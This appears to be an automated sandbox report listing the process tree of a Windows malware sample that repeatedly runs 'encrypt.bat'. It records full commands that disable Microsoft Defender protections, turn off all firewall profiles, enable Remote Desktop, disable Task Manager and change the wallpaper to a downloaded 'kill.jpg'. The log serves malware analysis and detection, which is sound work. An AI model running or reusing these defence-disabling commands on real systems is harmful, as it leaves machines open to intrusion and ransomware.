C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
4⤵
- Modifies Windows Firewall
PID:2764

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
4⤵
- Modifies Windows Firewall
PID:1564

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:3388

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
4⤵
- Modifies Windows Firewall
PID:4712

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
4⤵
- Modifies Windows Firewall
PID:4540

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:4808

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:4668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
4⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
5⤵
PID:4464

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
6⤵
PID:684

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
6⤵
PID:1600

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
6⤵
PID:2052

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
6⤵
PID:1560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
6⤵
- Modifies Windows Firewall
PID:3920

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
6⤵
- Modifies Windows Firewall
PID:1532

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
6⤵
- Modifies Windows Firewall
PID:1480

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
6⤵
- Modifies Windows Firewall
PID:3672

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
6⤵
- Modifies Windows Firewall
PID:3320

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
6⤵
- Modifies Windows Firewall
PID:1420

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
6⤵
- Modifies Windows Firewall
PID:3744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
6⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
7⤵
PID:3328

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
8⤵
PID:4808

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
8⤵
PID:3672

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
8⤵
PID:3180

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
8⤵
PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
8⤵
- Modifies Windows Firewall
PID:3044

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
8⤵
- Modifies Windows Firewall
PID:4052

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
8⤵
- Modifies Windows Firewall
PID:2656

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
8⤵
- Modifies Windows Firewall
PID:2676

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
8⤵
- Modifies Windows Firewall
PID:4924

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
8⤵
- Modifies Windows Firewall
PID:916

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
8⤵
- Modifies Windows Firewall
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
8⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
9⤵
PID:1628

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
10⤵
PID:2448

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
10⤵
PID:3920

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
10⤵
PID:2748

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
10⤵
PID:4552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
10⤵
- Modifies Windows Firewall
PID:4296

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
10⤵
- Modifies Windows Firewall
PID:4540

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
10⤵
- Modifies Windows Firewall
PID:1708

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
10⤵
- Modifies Windows Firewall
PID:4140

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
10⤵
- Modifies Windows Firewall
PID:2004

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
10⤵
- Modifies Windows Firewall
PID:1616

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
10⤵
- Modifies Windows Firewall
PID:928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
10⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
11⤵
PID:3748

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
12⤵
PID:2412

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
12⤵
PID:5048

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
12⤵
PID:4012

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
12⤵
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4140

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
12⤵
- Modifies Windows Firewall
PID:5016

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
12⤵
- Modifies Windows Firewall
PID:3208

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
12⤵
- Modifies Windows Firewall
PID:1016

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
12⤵
- Modifies Windows Firewall
PID:3300

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
12⤵
- Modifies Windows Firewall
PID:2384

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
12⤵
- Modifies Windows Firewall
PID:1684

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
12⤵
- Modifies Windows Firewall
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
12⤵
- Command and Scripting Interpreter: PowerShell
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
12⤵
- Command and Scripting Interpreter: PowerShell
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
12⤵
PID:3160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
12⤵
- Command and Scripting Interpreter: PowerShell
PID:236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
12⤵
- Modifies registry class
PID:2412

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
13⤵
PID:3644

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
14⤵
PID:3320

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
14⤵
PID:3044

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
14⤵
PID:2656

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
14⤵
PID:1052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
14⤵
PID:276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:3320

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
14⤵
- Modifies Windows Firewall
PID:4668

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
14⤵
- Modifies Windows Firewall
PID:4972

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
14⤵
- Modifies Windows Firewall
PID:1684

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
14⤵
- Modifies Windows Firewall
PID:5108

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
14⤵
- Modifies Windows Firewall
PID:1008

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
14⤵
- Modifies Windows Firewall
PID:4688

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
14⤵
- Modifies Windows Firewall
PID:2052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:5096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:2784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
14⤵
PID:4592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
14⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
14⤵
PID:724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
15⤵
PID:2088

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
16⤵
PID:3864

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
16⤵
PID:2980

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
16⤵
PID:464

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
16⤵
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
16⤵
- Command and Scripting Interpreter: PowerShell
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
16⤵
- Command and Scripting Interpreter: PowerShell
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
16⤵
- Command and Scripting Interpreter: PowerShell
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
16⤵
- Command and Scripting Interpreter: PowerShell
PID:4156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
16⤵
- Command and Scripting Interpreter: PowerShell
PID:4668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
14⤵
- Command and Scripting Interpreter: PowerShell
PID:3916

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
14⤵
PID:1016

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
14⤵
PID:1440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3180

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
12⤵
- Sets desktop wallpaper using registry
PID:1736

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
12⤵
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
